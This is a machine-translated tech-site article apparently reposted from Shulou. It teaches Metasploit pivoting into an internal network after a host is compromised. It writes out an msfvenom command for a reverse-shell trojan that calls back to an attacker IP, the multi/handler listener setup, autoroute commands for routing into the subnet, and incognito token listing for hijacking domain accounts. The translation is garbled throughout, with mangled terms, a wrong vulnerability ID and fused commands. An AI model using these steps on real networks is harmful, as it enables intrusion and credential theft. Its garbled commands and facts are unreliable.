Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how Metasploit routing and forwarding can achieve intranet penetration, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

Make use of background

In the process of infiltration, we often encounter this scenario: we have acquired an intranet server through web infiltration. In order to further infiltrate the intranet, we will use the "enemy-occupied host" as a springboard to further infiltrate the intranet and expand the results.

The hypothetical scenario now is that we have already taken down the remote desktop environment of an intranet server, and during the intranet penetration, we found that there are a large number of vulnerable hosts in the intranet that store MS17-0100.If we want to take these hosts, we may have to use the NSA toolkit, but the use of this toolkit is quite troublesome. Here is an idea that we can use the "enemy-occupied host" as a springboard. To achieve direct penetration of intranet hosts using MSF framework. The MSF framework provides us with a good functional springboard function module, which can add a forwarding route to the intranet.

Utilization process

Attack plane ip:192.168.1.106 listening port: 1234

Target aircraft ip:192.168.1.108

1. Generate a Trojan file on the attack side

Root@kali:~# msfvenom-p windows/meterpreter/reverse_tcp LHOST=192.168.1.106LPORT=1234-f exe-o payload.exe

Using bounce connection under 2.msf

Root@kali:~# msfconsole

Msf > use exploit/multi/handler

3. Set the payload required for the bounce

Msf exploit (multi/handler) > set payload windows/meterpreter/reverse_tcp

4. View configuration options

Msf exploit (multi/handler) > show options

5. Set the IP and port of the host that bounced back.

Msf exploit (multi/handler) > set LHOST 192.168.1.106

Msf exploit (multi/handler) > set LPORT 1234

6. The target host opens the Trojan program file payload.exe and gets the bounce shell.

Msf exploit (multi/handler) > run

MSF springboard function

The springboard function of MSF is a routing and forwarding function included in the MSF framework. Its implementation process is that the MSF framework adds a route to the "intranet" on the basis of the acquired meterpreter shell, and directly uses msf to access the intranet resources that can not be accessed directly. As long as the routing can reach, then we use the powerful function of msf to do whatever we want.

Get the information about the target private network

Run get_local_subnets

-- > obtain the private network address segment of the target under attack

Run autoroute-s 192.168.1.0 Universe 24

-- > scan the information of the entire C segment of a valid Nic

Run autoroute-p

-- > View the domain environment

Use incognito

-- > call hijacking domain management module

List_tokens-u

-- > View the domain environment information of the current target host

Add a forwarding route to the destination network segment

Run autoroute-s

View route addition

Run autoroute-p

After the route to the intranet is opened, the MSF platform can be used to directly scan the intranet host and directly infiltrate and exploit various high-risk vulnerabilities.

After reading the above, do you have any further understanding of how Metasploit routing and forwarding can achieve intranet penetration? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.